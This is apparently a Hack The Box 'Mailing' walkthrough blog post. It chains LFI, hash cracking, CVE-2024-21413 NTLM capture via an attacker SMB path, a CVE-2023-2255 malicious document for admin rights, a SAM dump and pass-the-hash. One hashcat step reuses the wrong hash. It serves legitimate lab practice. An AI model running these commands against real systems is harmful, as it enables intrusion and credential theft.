mmckinnon/chirpy-starter
1
0
Fork 0
mirror of https://github.com/cotes2020/chirpy-starter.git synced 2025-04-21 11:53:27 +10:00
Code Issues Actions Packages Projects Releases Wiki Activity
chirpy-starter/_posts/2024-01-07-mailing.md
racc0x 6278b1b310 update-2025
2025-02-03 22:22:27 -06:00

245 lines
9.3 KiB
Markdown
Raw Blame History

---
title: HTB - Mailing
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , Mailing]
tags: [HackTheBox, Impacket, wmiexec, NTLM, CVE-2024-21413, telnet, Evil-winrm, smb, more, nmap, hashcat, Dump Sam Hash, ]
image:
path: /assets/img/post/mailing/Mailing-card.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - Mailing.
---
## Box Info
| Name | Mailing |
| :-------------------- | ---------------: |
| Release Date | 02 Mar, 2024 |
| OS | Windows |
| Rated Difficulty | Easy |
## **Enumeration**
```bash
nmap -p- --open --min-rate 5000 -sS -n -vvv -Pn 10.10.11.14 -oG allPorts
```
![Image](/assets/img/post/mailing/1.png)
![Image](/assets/img/post/mailing/2.png)
ExtractPorts
```bash
nmap -sCV -p 25,80,110,135,139,143,445,465,587,993,5040,5985,7680,47001... 10.10.11.14 -oN targeted
```
![Image](/assets/img/post/mailing/3.png)
![Image](/assets/img/post/mailing/4.png)
![Image](/assets/img/post/mailing/5.png)
#### **Adding Domain to Hosts File**
```bash
echo "10.10.11.14 mailing.htb" | sudo tee -a /etc/hosts
```
![Image](/assets/img/post/mailing/6.png)
![Image](/assets/img/post/mailing/7.png)
## **Information Gathering**
Below the website you can download a pdf file.
![Image](/assets/img/post/mailing/8.png)
the file download has this potential `LFI`
![Image](/assets/img/post/mailing/9.png)
### Directory Brute Forcing
Dirsearch
![Image](/assets/img/post/mailing/10.png)
Or with curl -I can give you something interesting
`curl -I <http://mailing.htb/`>
![Image](/assets/img/post/mailing/11.png)
## **Exploitation**
Our first foothold is the **LFI** found. We go to intercept the request and see what we can do.
`/download.php?file=../../windows/system32/drivers/etc/hosts`{: filepath}
![Image](/assets/img/post/mailing/12.png)
We will try to point to the hosts file to confirm if we are against an LFI.
After exploring the folder structure of hMailServer and asking ChatGPT what should be inside, I found the `hMailServer.INI` file in the `bin` folder and `hmailserver_awstats.log` in the `logs` folder. [Structure folder from hMailServer](https://www.hmailserver.com/documentation/v4.4/?page=folderstructure)
I accessed the logs to determine which emails I can access.
![Image](/assets/img/post/mailing/13.png)
In the `hMailServer.INI` file, I found the passwords for the admin and the database
![Image](/assets/img/post/mailing/14.png)
Using a hash identifier to determine the type of hash before attempting to crack it
![Image](/assets/img/post/mailing/15.png)
We can use [crackstation](https://crackstation.net/) for crack it or use `hashcat` as alternative
![Image](/assets/img/post/mailing/16.png)
`echo "841bb5acfa6779ae432fd7a4e6600ba7" >> hash2.txt`
```bash
hashcat -m 0 -a 0 -o cracked.txt hash2.txt /usr/share/wordlists/rockyou.txt
```
- `m 0` sets the mode to MD5.
- `a 0` specifies a dictionary attack.
![Image](/assets/img/post/mailing/17.png)
841bb5acfa6779ae432fd7a4e6600ba7:`homenetworkingadministrator`
## **Telnet**
I'm using Telnet to verify if I can access the mail using this password.
![Image](/assets/img/post/mailing/18.png)
![Image](/assets/img/post/mailing/19.png)
But we cant do anything, there is no exploitable email in the mailbox, but now that I have the credentials of the mail server, I thought that I could obtain NTLM by forcing access to the responder.
`NTLM Hash (Windows Challenge/Response) is the cryptographic format in which user passwords are stored on Windows systems.`
[**¿How works the NTLM Authentication?**](https://www.ionos.mx/digitalguide/servidores/know-how/ntlm/)
After investigating some CVEs, I found one that allows me to send an email to the Maya user found in the log, for to capture an NTLM password.
## CVE-2024-21413
`sudo responder -I tun0`
```bash
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.16.20\mailing' --subject HI
```
![Image](/assets/img/post/mailing/20.png)
![Image](/assets/img/post/mailing/21.png)
`Hash from user maya`
```text
maya::MAILING:5e0eb9256971de1f:DEBA7F01E81351DCFEDA3C905CA932E8:010100000000000080BA1036359FDA01E3495C93763B0B450000000002000800460042005600410001001E00570049004E002D003300410035005400350049004F00550048003800330004003400570049004E002D003300410035005400350049004F0055004800380033002E0046004200560041002E004C004F00430041004C000300140046004200560041002E004C004F00430041004C000500140046004200560041002E004C004F00430041004C000700080080BA1036359FDA010600040002000000080030003000000000000000000000000020000080F0D79319E6BB3D505B32F68F03892752BD8DD6272B1FBD42563DB8BA2BE13A0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000
```
## Hashcat
`echo "841bb5acfa6779ae432fd7a4e6600ba7" >> hash.txt`
```
hashcat -m 5600 hash.txt -a 0 -o cracked_passwords.txt /usr/share/wordlists/rocky
```
- `m 5600` specifies the NTLMv2 hash mode.
- `a 0` specifies a dictionary attack.
-
![Image](/assets/img/post/mailing/22.png)
![Image](/assets/img/post/mailing/23.png)
## Evil-Winrm
`evil-winrm -i 10.10.11.14 -u maya -p 'm4y4ngs4ri'`
![Image](/assets/img/post/mailing/24.png)
User flag
![Image](/assets/img/post/mailing/25.png)
## **Privilege Escalation**
After researching how to perform Privilege Escalation on a Windows server, I found some CVEs that seem interesting, such as CVE-2023-2255 for LibreOffice.
![Image](/assets/img/post/mailing/26.png)
[_**CVE Libre Office**_](https://github.com/elweth-sec/CVE-2023-2255?tab=readme-ov-file)
**CVE-2023-2255**
`python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'`
To accomplish this, I will embed the user Maya into the exploit.odt file and grant permissions to the local group Administradores.
## **SMB Server**
There is an important documents folder under C:. Note that the folder has administrator rights to run.
![Image](/assets/img/post/mailing/27.png)
Most likely you put the odt file in there (important documents) and then get the admin shell
`impacket-smbserver mailing` pwd `-smb2support`
![Image](/assets/img/post/mailing/28.png)
Let the Maya user, running in `evil-winrm`, connect and copy the `exploit.odt` file into the `Important Documents` directory, prompting Maya to click and run the `exploit.odt` file.
```
net use \\\\10.10.16.20\\mailing
copy \\\\10.10.16.20\\mailing\\exploit.odt
```
![Image](/assets/img/post/mailing/29.png)
After waiting for a few seconds, I'll check the status of the Maya user.
`net user maya`
## **Dump SAM Hash**
![Image](/assets/img/post/mailing/30.png)
⭐_HackTool:Win32/Dump is a command line tool that dumps password hashes from Windows NT's SAM(Security Accounts Manager) database. The dumped password hashes can be fed into an NT password auditing tool, such as L0phtCrack to recover the passwords of Windows NT users._
**`crackmapexec smb 10.10.11.14 -u maya -p "m4y4ngs4ri" --sam`**
- `crackmapexec smb`: Specifies that `crackmapexec` will be used to interact with the SMB protocol. `crackmapexec` is a versatile tool used for pentesting the security of network services, SMB being one of them.
- `u maya`: This flag followed by `maya` specifies the username to be used when authenticating to the SMB service on the target machine.
- `p "m4y4ngs4ri"`: This flag followed by `"m4y4ngs4ri"` specifies the password for the username provided. Together with the username, this forms the credentials used for SMB authentication.
- `-sam`: This is an option that instructs `crackmapexec` to attempt to dump the SAM (Security Account Manager) database. The SAM database stores user credentials in a Windows system, typically hashed passwords. Dumping the SAM can be used to retrieve these hashes, which can then be cracked offline to obtain plaintext passwords.
![Image](/assets/img/post/mailing/31.png)
## **Remote Windows machine using WMIExec**
`impacket-wmiexec localadmin@10.10.11.14 -hashes aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae`
- `impacket-wmiexec`: This is a script from the Impacket suite, which is a collection of Python classes for working with network protocols. `impacket-wmiexec` is specifically designed for executing commands remotely on Windows systems using WMI.
- `localadmin@10.10.11.14`:
- `localadmin` is the username being used to authenticate.
- `10.10.11.14` is the IP address of the target machine where commands will be executed.
- `hashes aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae`:
- `hashes` specifies that hash values are being used instead of a plaintext password for authentication.
- `aad3b435b51404eeaad3b435b51404ee` is the LM hash. It is often a placeholder since LM hashing is less secure and frequently disabled in modern systems.
- `9aa582783780d1546d62f2d102daefae` is the NT hash, which is the hash of the actual password for the account.
[Impacket-wmiexec](https://tools.thehacker.recipes/impacket)
![Image](/assets/img/post/mailing/32.png)
`Root`
Reference in New Issue View Git Blame Copy Permalink